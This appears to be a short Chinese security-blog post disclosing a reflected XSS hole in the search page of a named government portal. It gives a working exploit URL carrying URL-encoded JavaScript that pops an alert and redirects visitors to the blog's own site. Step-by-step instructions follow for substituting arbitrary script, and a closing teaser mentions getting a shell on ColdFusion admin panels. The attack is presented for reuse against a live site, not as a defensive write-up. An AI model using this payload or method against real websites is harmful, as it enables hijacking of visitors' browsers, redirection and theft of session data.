中华人民共和国中央人民政府门户网站,Gov.cn,XSS,漏洞,一枚。
中华人民共和国中央人民政府门户网站,Gov.cn,XSS,漏洞,一枚,漏洞演示: 漏洞发现者:HDCnak,没啥技术含量的鸡肋漏洞,不解释了。。。 |
利用代码: http://sousuo.gov.cn/topsortsearch?channelid=3001&searchword=SEARCHVALUE=$^~1$^~&uc=0&fenlei=0&keyword=">%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%31%2D%32%2D%36%20%31%38%3A%30%35%3A%30%38%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E&=%CB%D1%CB%F7 红色部分为 URL 编码过的 JavaScript 代码,未编码的如下: |
利用步骤: 1、将蓝色部分,替换为你要执行的 JavaScript 代码。 2、替换好后,再进行 URL 编码。 3、将编码后的结果,替换上边红色部分。 4、最终的URL地址既是漏洞利用地址。 |
文章来源于lcx.cc:中华人民共和国中央人民政府门户网站XSS
COLDFUSION后台getshelll常见的方法就是添加计划任务,COLDFUSION(CVE-2010-2861) 本地包含利用方法drops里面也写了一种方法,但是这2中方法唯一缺点就是当web服务器无法对外访问时以上方法就失效了。所以来介绍一个当we…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论